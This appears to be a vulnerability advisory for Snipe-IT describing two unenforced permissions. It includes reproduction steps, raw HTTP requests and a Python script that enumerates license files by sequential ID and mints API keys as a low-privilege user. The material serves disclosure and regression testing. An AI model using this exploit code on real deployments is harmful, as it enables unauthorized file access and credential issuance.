API Security Blog

Improper Authentication

# Description
Two permissions are not enforced: `Licenses -> View and Modify License Files` and `Self -> Create API Keys`.

## License Files
Files can be uploaded to licenses, and a dedicated user permission, `View and Modify License Files`, is meant to gate access to them. The permission is not enforced: a user who lacks it can still download files attached to licenses as long as they hold the `View` permission for licenses. Because the file identifier in the download URL is a sequential integer, such a user can also enumerate every uploaded file simply by incrementing that identifier.

### Proof of Concept
Steps to reproduce:
```
1. Log in as admin
2. Go to Licenses and create a new license with arbitrary values
3. Click on the license, go to File Uploads and upload two or three PoC files
4. Observe that the download links for the uploaded files are of the form `/licenses//showfile/`, with the license id and the `file_id` in the two empty path segments (compare the request below, `/licenses/1/showfile/3`). `file_id` increments by one for each additional file uploaded
5. Go to People and create a new user. Deny all permissions except `Licenses -> View`. In particular `View and Modify License Files` is denied, i.e. the user should not be able to view license files
6. Log in as the newly created user, click on Licenses and click on the license created earlier. Note that a click on `File Uploads` does nothing
7. The URL should now be `/licenses/` followed by the license id
8. Append `/showfile/3` to the URL and observe that the first uploaded file is downloaded
9. All files can be enumerated by incrementing the `file_id`
```

PoC Request from User with only `Licenses -> View` Permission:
```
GET /licenses/1/showfile/3 HTTP/1.1
Host: 127.0.0.1:8000
Connection: close
Cookie: snipeit_session=bFxcGzG8fZAfZvPFivACCT7XN9GXdYRBhrvLgZuh
Content-Length: 2
```

## API Keys
A user can create API keys to authenticate to API endpoints. There is a permission called `Create API keys`; however, users without this permission can still create API keys, which renders the permission ineffective.

### Proof of Concept
Steps to reproduce:
```
1. Log in as admin
2. Go to People and create a new user. Deny all permissions; in particular `Self -> Create API keys` is denied, i.e. the user should not be able to create API keys
3. Log in as the newly created user
4. Take note of the `snipeit_session` cookie and the `csrf-token` meta tag in the HTML head of the response to `/account/view-assets`
5. Send the request below to create an API key and observe that an API key is returned
```

API Creation Request (replace the CSRF Token and session cookie accordingly):
```
POST /oauth/personal-access-tokens HTTP/1.1
Host: 127.0.0.1:8000
X-CSRF-TOKEN: wqLZMfHIXhA8WdsJLmghGHird8AWlDYb8SeEIAIp
Content-Type: application/json;charset=utf-8
Connection: close
Cookie: snipeit_session=CAwxBX0UfnzSh4GD2mIASL0Fp2eoUegXBxOWRN3d
Content-Length: 38

{"name":"asd","scopes":[],"errors":[]}
```

The created API key is valid although the user does not have the permission to create API keys.
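Both checks on this page can be scripted so that they double as a regression test once the permissions are enforced. The script below is an added example, not code from the advisory or from the Snipe-IT project. It assumes the PoC host from the captures (`127.0.0.1:8000`), that a correctly denied file download answers 401/403 or redirects to `/login`, that a 404 means the `file_id` counter has run past the last upload, and that Laravel Passport answers the token POST with JSON carrying the new key under `accessToken`; the HTTP transport is injected as a `fetch` callable so the logic can also be exercised against canned responses without a server.

```python
# Added example: scripted versions of the two permission checks above.
# Assumptions (not from the advisory): denied download = 401/403 or redirect to
# /login; 404 = counter exhausted; Passport returns the key as JSON "accessToken".
import http.client
import json
import sys
from typing import Callable, Dict, List, Optional, Tuple

# A response is (status, headers, body); a fetch takes (method, path, headers, body).
Response = Tuple[int, Dict[str, str], bytes]
Fetch = Callable[[str, str, Dict[str, str], bytes], Response]


def http_fetch(host: str = "127.0.0.1", port: int = 8000) -> Fetch:
    """Live transport: one connection per request, redirects NOT followed (a redirect to /login is a result)."""
    def fetch(method: str, path: str, headers: Dict[str, str], body: bytes) -> Response:
        conn = http.client.HTTPConnection(host, port, timeout=10)
        conn.request(method, path, body=body or None, headers=headers)
        resp = conn.getresponse()
        data = resp.read()
        conn.close()
        return resp.status, dict(resp.getheaders()), data
    return fetch


def showfile_path(license_id: int, file_id: int) -> str:
    """Same shape as the captured request: /licenses/1/showfile/3."""
    return f"/licenses/{license_id}/showfile/{file_id}"


def classify_download(status: int, headers: Dict[str, str]) -> str:
    """Map one showfile response to an outcome (assumed status mapping, see header comment)."""
    if status == 200:
        return "downloaded"
    if status in (301, 302, 303) and "/login" in headers.get("Location", ""):
        return "unauthenticated"
    if status in (401, 403):
        return "denied"
    if status == 404:
        return "missing"
    return f"other:{status}"


def enumerate_license_files(fetch: Fetch, session_cookie: str, license_id: int,
                            start: int = 1, max_id: int = 10000, misses: int = 5) -> List[Tuple[int, str]]:
    """Walk the sequential file_id counter with a Licenses -> View only session.
    Every 'downloaded' entry is the bug (the session lacks View and Modify License Files).
    Stops after `misses` consecutive 404s, i.e. once the counter is exhausted."""
    headers = {"Cookie": f"snipeit_session={session_cookie}"}
    found: List[Tuple[int, str]] = []
    consecutive_missing = 0
    for file_id in range(start, max_id + 1):
        status, resp_headers, _ = fetch("GET", showfile_path(license_id, file_id), headers, b"")
        outcome = classify_download(status, resp_headers)
        if outcome == "missing":
            consecutive_missing += 1
            if consecutive_missing >= misses:
                break
            continue
        consecutive_missing = 0
        found.append((file_id, outcome))
    return found


def token_request(name: str, csrf_token: str, session_cookie: str) -> Tuple[str, str, Dict[str, str], bytes]:
    """The POST from the second PoC: session cookie plus the X-CSRF-TOKEN header that
    Laravel requires on session-authenticated state-changing requests."""
    body = json.dumps({"name": name, "scopes": [], "errors": []}, separators=(",", ":")).encode()
    headers = {
        "X-CSRF-TOKEN": csrf_token,
        "Content-Type": "application/json;charset=utf-8",
        "Cookie": f"snipeit_session={session_cookie}",
        "Content-Length": str(len(body)),
    }
    return "POST", "/oauth/personal-access-tokens", headers, body


def extract_access_token(status: int, body: bytes) -> Optional[str]:
    """None = server refused (correct for a user without Self -> Create API keys);
    a string = a key was issued, so the permission is not enforced."""
    if status != 200:
        return None
    try:
        value = json.loads(body.decode()).get("accessToken")
    except (ValueError, AttributeError):
        return None
    return value if isinstance(value, str) else None


def create_api_key(fetch: Fetch, name: str, csrf_token: str, session_cookie: str) -> Optional[str]:
    method, path, headers, body = token_request(name, csrf_token, session_cookie)
    status, _, resp_body = fetch(method, path, headers, body)
    return extract_access_token(status, resp_body)


if __name__ == "__main__":
    # usage: python check.py <snipeit_session cookie> <license_id> <csrf-token>
    cookie, lic, csrf = sys.argv[1], int(sys.argv[2]), sys.argv[3]
    live = http_fetch()
    for fid, outcome in enumerate_license_files(live, cookie, lic):
        print(f"file_id={fid}: {outcome}")
    key = create_api_key(live, "poc", csrf, cookie)
    print("API key issued despite missing permission:" if key else "token request refused:", key)
```

Run it with the cookie and CSRF token of the low-privilege user from the steps above. On a vulnerable build the first loop prints `downloaded` for every existing `file_id` and the final line shows a freshly issued key; on a build that enforces both permissions every existing file should come back `denied` and `create_api_key` should return `None`.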
